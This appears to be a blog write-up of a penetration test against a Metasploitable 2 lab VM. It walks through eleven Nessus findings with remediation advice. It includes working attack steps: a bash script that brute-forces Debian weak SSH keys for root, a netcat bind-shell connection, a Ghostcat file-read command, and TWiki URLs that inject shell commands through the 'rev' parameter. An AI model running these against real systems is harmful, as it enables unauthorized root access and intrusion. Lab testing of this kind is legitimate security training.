This is Part 2 of my VAPT series. If you haven't read Part 1 (Vulnerability Assessment using Nessus in a Virtual Lab), you can find it here: Part 1 — https://medium.com/@ckuldeep28/vulnerability-assessment-using-nessus-in-a-virtual-lab-7c6a2e2a3d7b

When I published Part 1, I made a promise — that I would come back and complete the penetration testing phase.

That time has come.

In Part 1, I used Nessus to scan a Metasploitable 2 target and identified 38 vulnerabilities ranging from Critical to Low. But identifying vulnerabilities is only half the story. The real question is: which ones can actually be exploited, and what's the real-world impact?

That's exactly what this article covers.

A Quick Recap

Lab Environment:

• 🔹 Attacker: Kali Linux (with Nessus installed)
• 🔹 Target: Metasploitable 2 (192.168.4.33)
• 🔹 Both machines on the same network using Bridged Adapter

The Nessus scan from Part 1 returned findings across all severity levels. For this penetration testing phase, I focused on the Critical vulnerabilities first, then selected a few notable High severity findings worth demonstrating.

The full PoC evidence for all 38 vulnerabilities is documented in my GitHub repository — link at the end of this article.

The Approach

Rather than using automated exploitation frameworks for everything, I focused on manual and semi-manual PoC techniques wherever possible. This is a deliberate choice — it demonstrates a deeper understanding of what's actually happening, which matters more in a professional context than just running Metasploit modules.

Each finding below follows the same structure:

• What Nessus flagged
• What the vulnerability actually means
• How I validated it
• Remediation recommendation

🔴 Critical Findings

1. Debian OpenSSH/OpenSSL Weak Keys — CVE-2008–0166 (CVSS 10.0)

Port: 22 (SSH)

What it is: In 2008, Debian's OpenSSL package had a broken random number generator. Instead of generating truly random SSH keys, it could only produce around 32,767 unique key combinations — all of which were pre-computed and published by HD Moore of Metasploit.

This means any SSH key generated on an affected Debian/Ubuntu system is effectively guessable.

How I validated it:

I wrote a custom bash script to iterate through the pre-generated key archive and attempt SSH authentication against the target:

#!/bin/bash
find rsa/2048/ -type f | while read k; do
  chmod 600 "$k"
  echo "[-] Trying: $k"
  result=$(ssh -oHostKeyAlgorithms=+ssh-rsa \
               -oPubkeyAcceptedAlgorithms=+ssh-rsa \
               -oBatchMode=yes \
               -oConnectTimeout=5 \
               -i "$k" root@192.168.4.33 \
               "id" 2>&1)
  if echo "$result" | grep -q "uid="; then
    echo "[+] WORKING KEY: $k"
    echo "$result"
    break
  fi
done

#!/bin/bash
find rsa/2048/ -type f | while read k; do
  chmod 600 "$k"
  echo "[-] Trying: $k"
  result=$(ssh -oHostKeyAlgorithms=+ssh-rsa \
               -oPubkeyAcceptedAlgorithms=+ssh-rsa \
               -oBatchMode=yes \
               -oConnectTimeout=5 \
               -i "$k" root@192.168.4.33 \
               "id" 2>&1)
  if echo "$result" | grep -q "uid="; then
    echo "[+] WORKING KEY: $k"
    echo "$result"
    break
  fi
done

Result:

[+] WORKING KEY: rsa/2048/57c3115d77c56390332dc5c49978627a-5429
uid=0(root) gid=0(root) groups=0(root)

[+] WORKING KEY: rsa/2048/57c3115d77c56390332dc5c49978627a-5429
uid=0(root) gid=0(root) groups=0(root)

Root access confirmed. No password required.

Remediation: Regenerate all SSH, SSL, and OpenVPN keys using a patched version of OpenSSL. Any key material generated on the affected system must be considered compromised.

2. Bind Shell Backdoor Detection (CVSS 10.0)

Port: 1524

What it is: A shell is listening on port 1524 with no authentication whatsoever. Anyone who connects to this port gets an interactive root shell immediately — no credentials, no exploit needed.

This is a deliberate backdoor that ships with Metasploitable 2, simulating a compromised host.

How I validated it:

nc 192.168.4.33 1524

nc 192.168.4.33 1524

Immediate response:

root@metasploitable:/#

root@metasploitable:/#

Remediation: Verify whether the system has been compromised. If confirmed, reinstall the OS entirely. Audit all running services for unexpected listeners.

3. VNC Server Default Password (CVSS 10.0)

Port: 5900

What it is: The VNC server on the target is secured with the password password. Nessus confirmed this by logging in successfully. A remote attacker can gain full graphical desktop control without any technical knowledge.

How I validated it:

Connected using a VNC client with the password password:

vncviewer 192.168.4.33

vncviewer 192.168.4.33

Full desktop access granted immediately.

Remediation: Set a strong, unique VNC password. Better still, disable VNC entirely and use SSH tunnelling for remote access.

4. Apache PHP-CGI Remote Code Execution — CVE-2012–1823 (CVSS 7.5)

Port: 80

What it is: The PHP installation on the target allows an attacker to pass command-line arguments via query strings to the PHP-CGI program. This can be abused to execute arbitrary commands on the server, read source code, or crash the service.

This is a well-known and heavily exploited vulnerability (CVSS 7.5, listed as Critical by Nessus).

How I validated it:

Nessus confirmed this with a crafted POST request to /cgi-bin/php. The server responded by executing the id command, confirming remote code execution.

Remediation: Upgrade to PHP 5.3.13 / 5.4.3 or later. If using CGI mode, ensure PHP-CGI is not exposed directly.

5. Apache Tomcat Ghostcat — CVE-2020–1938 (CVSS 5.0)

Port: 8009 (AJP Connector)

What it is: The Apache Tomcat AJP connector has a file read/inclusion vulnerability known as Ghostcat. An unauthenticated attacker can read any file from within the web application, including configuration files containing credentials. On servers that allow file uploads, this escalates to Remote Code Execution.

How I validated it:

Beyond Nessus detection, I manually confirmed this using ajpShooter.py, a public Ghostcat exploit tool:

python ajpShooter.py http://192.168.4.33:8080/ 8009 /WEB-INF/web.xml read

The server responded with 200 OK and returned the full contents of web.xml, confirming unauthenticated file read via the AJP connector.

Remediation: Upgrade Apache Tomcat to 7.0.100, 8.5.51, or 9.0.31+. If the AJP connector is not needed, disable it entirely in server.xml.

6. SSL Version 2 and 3 Protocol Detection (CVSS 9.8)

Ports: 25, 5432

What it is: The target accepts connections using SSLv2 and SSLv3 — both deprecated protocols with known cryptographic weaknesses including insecure padding in CBC mode and unsafe session renegotiation. This exposes connections to POODLE and DROWN attacks.

To further confirm the POODLE exposure, I ran a targeted Nmap script:

Remediation: Disable SSLv2 and SSLv3 entirely. Enforce TLS 1.2 or higher with approved cipher suites.

7. phpMyAdmin SQL Injection — CVE-2019–11768 (CVSS 5.0)

Port: 80

What it is: The installed version of phpMyAdmin (3.1.1) is vulnerable to SQL injection in the designer feature. An unauthenticated attacker can manipulate database queries, potentially disclosing or modifying arbitrary data. The fixed version is 4.8.6.

How I validated it:

I confirmed version exposure. Full SQLi exploitation was not performed in this assessment.

Remediation: Upgrade to phpMyAdmin 4.8.6 or later immediately.

🟠 Notable High Findings

8. TWiki 'rev' Parameter Command Execution — CVE-2005–2877 (CVSS 4.0)

Port: 80

What it is: The TWiki installation allows an attacker to inject shell commands through the rev parameter. This results in arbitrary command execution under the web server's user account (www-data).

How I validated it:

The following URL triggered command execution:

http://192.168.4.33/twiki/bin/view/Main/TWikiUsers?rev=2%20%7cid%7c%7cecho%20

http://192.168.4.33/twiki/bin/view/Main/TWikiUsers?rev=2%20%7cid%7c%7cecho%20

Response:

uid=33(www-data) gid=33(www-data) groups=33(www-data)

uid=33(www-data) gid=33(www-data) groups=33(www-data)

"To further confirm command execution, I replaced the id command with hostname in the URL:"

http://192.168.4.33/twiki/bin/view/Main/TWikiUsers?rev=2%20%7cid%7c%7chostname%20

"The page returned metasploitable — confirming we have arbitrary command execution on the target machine."

Remediation: Apply the hotfix referenced in the TWiki vendor advisory, or upgrade to a patched version.

9. NFS Shares World-Readable (CVSS 4.0)

Port: 2049

What it is: The NFS server is exporting shares without any access restrictions. The root filesystem (/ *) is accessible to anyone on the network. This allows an attacker to read sensitive files including /etc/shadow, SSH keys, and application configs.

Remediation: Restrict NFS exports by IP range or hostname in /etc/exports. Never export the root filesystem.

10. rlogin / rsh Services — CVE-1999–0651 (CVSS 7.5)

Ports: 513 (rlogin), 514 (rsh)

What it is: Both rlogin and rsh are legacy remote access services running on the target. These services were misconfigured with a trust relationship via .rhosts, allowing an attacker to log in as root without any username or password. Additionally, these protocols transmit all data including credentials in cleartext — meaning any credentials used would be fully visible to anyone intercepting network traffic.

Remediation: Disable both services immediately. Comment out the relevant lines in /etc/inetd.conf and replace with SSH.

11. Samba Badlock Vulnerability — CVE-2016–2118 (CVSS 4.3)

Port: 445

What it is: The Samba version running on the target is affected by the Badlock vulnerability — a flaw in the SAM and LSAD protocols that allows a man-in-the-middle attacker to downgrade authentication and execute arbitrary Samba network calls, including viewing or modifying Active Directory data.

How I validated it" section saying:

Nessus detected Samba version 3.0.20-Debian running on port 445, which falls within the affected version range. The Badlock vulnerability requires a man-in-the-middle position to exploit — full exploitation was not performed in this lab environment. Detection was confirmed via Nessus and version fingerprinting.

Remediation: Upgrade to Samba 4.2.11, 4.3.8, or 4.4.2+.

Summary Table

Vulnerability Severity CVE Port Impact 1 Debian OpenSSL Weak Keys Critical 10.0 CVE-2008–0166 22 Root shell via SSH 2 Bind Shell Backdoor Critical 10.0–1524 Unauthenticated root shell 3 VNC Default Password Critical 10.0–5900 Full desktop control 4 PHP-CGI Remote Code Execution Critical 7.5 CVE-2012–1823 80 Remote code execution 5 Ghostcat AJP Connector Critical 5.0 CVE-2020–1938 8009 File read / RCE 6 SSL v2/v3 Protocol Critical 9.8–25, 5432 MITM / traffic decryption 7 phpMyAdmin SQLi Critical 5.0 CVE-2019–11768 80 Database manipulation 8 TWiki Command Execution High 4.0 CVE-2005–2877 80 OS command execution 9 NFS World-Readable High 4.0–2049 Sensitive file exposure 10 rlogin / rsh Services High 7.5 CVE-1999–0651 513, 514 Credential interception 11 Samba Badlock High 4.3 CVE-2016–2118 445 Auth downgrade / MITM

Key Takeaways

This exercise reinforced something important — a vulnerability score is just a number until it's validated. Several findings that seemed theoretical on paper resulted in immediate, unauthenticated root access in practice.

A few things I took away from this project:

Nessus is a starting point, not a conclusion. The scanner flagged 38 issues. The real work was understanding which ones had genuine exploitability and what the actual impact would be in a real environment.

Writing your own tools matters. Rather than relying entirely on pre-built Metasploit modules, I built a custom bash script for the CVE-2008–0166 exploitation. This forced a much deeper understanding of how the vulnerability actually works — knowledge that transfers to real engagements.

Legacy services are dangerous. rlogin, rsh, Telnet, SSLv2, SSLv3 — these are ancient protocols that should not exist on any modern system. Yet they consistently appear in real-world assessments.

What's Next

The full PoC evidence ZIP folder — all 38 vulnerabilities documented with screenshots — is available in my GitHub repository:

🔗 GitHub Repository: [Link to your GitHub repo here]

That folder contains individual PoC directories for every finding from Critical down to Low, including medium findings like HTTP TRACE/TRACK methods, clickjacking, browsable directories, and more.

Thanks for reading. If you found this useful, the VA phase is documented in Part 1 linked at the top of this article.